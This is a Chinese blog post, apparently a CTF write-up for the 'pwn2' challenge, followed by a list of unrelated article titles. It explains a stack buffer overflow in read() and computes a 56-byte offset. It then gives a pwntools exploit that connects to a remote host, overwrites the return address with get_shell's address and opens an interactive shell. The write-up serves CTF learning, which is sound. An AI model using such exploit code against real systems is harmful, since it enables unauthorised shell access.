pwn-pwn2
2024-09-06 08:56:40
无保护的64位程序
然后丢到IDA看看 F5查看伪代码
main函数后面还有一个get_shell的函数
在main函数中read存在栈溢出漏洞,我们可以填充一些无意义的字符,等到字符的缓冲区满了,函数要返回的时候,我们输入我们的get_shell函数的入口地址,那么系统就会执行我们的get_shell函数
问题在于我们要输入多少字符
双击read函数中间的&s
我们可以算一下需要偏移距离 0x08-(0x30)=0x38个字符 也就是十进制的56,往read函数填充56个字符,在输入get_shell的地址,系统就会执行get_shell函数
那么get_shell函数的地址是多少
构造exp
from pwn import *
r=remote('114.116.54.89',10003)
payload='a'*0x38+p64(0x400751)
r.sendline(payload)
r.interactive()
执行
最新文章
- 【初学者指南】在ASP.NET MVC 5中创建GridView
- MFC下打开选择文件夹并获取文件夹的绝对路径
- WPFTookit Chart 入门
- 【转】前端工程筹建NodeJs+gulp+bower
- babel6 的 export default bug
- 更新整理本人所有博文中提供的代码与工具(C++,2013.10)
- [杂谈] My Wikipedia
- 【 D3.js 入门系列 --- 4 】 如何使用scale(比例)
- Android音乐播放器的开发实例
- windows7添�windows2008R2域配置
- 架构设计:负载均衡层设计方案(6)——Nginx + Keepalived构建高可用的负载层
- kali2.0 系统自带截图功能
- HTML5学习之FileReader接口
- HDU 4099 Revenge of Fibonacci (数学+字典数)
- js基础——cssText
- Warning: The Copy Bundle Resources build phase contains this target's Info.plist file 'yintingting_baisi/Info.plist'.
- 记一次lvs-tunnel模式的故障分析(7)
- [DeeplearningAI笔记]改善深层神经网络_优化算法2.1_2.2_mini-batch梯度下降法
- SpringMVC中的适配器(适配者模式)
- 提高测试脚本复用性降低DOM结构引起路径变化的影响
热门文章
- 爬取编程常用词汇,保存为Excel
- JavaScript内置对象及常见API
- 模块基础实战之ATM和购物车系统分文件处理
- #3145. 「APIO 2019」桥梁
- 解决邮件发送错误:503 Error: need EHLO and AUTH first
- 网络聊天室---node.js中net网络模块TCP服务端与客户端的使用
- 正则表达式中的.*?和python中re.S参数的详解
- PHP7.1.X+wordpress+windows,安装Memcached服务
- go-数据结构
- 禁止页面被复制和禁止右键,一段样式一段JS就行了,无需复杂设定!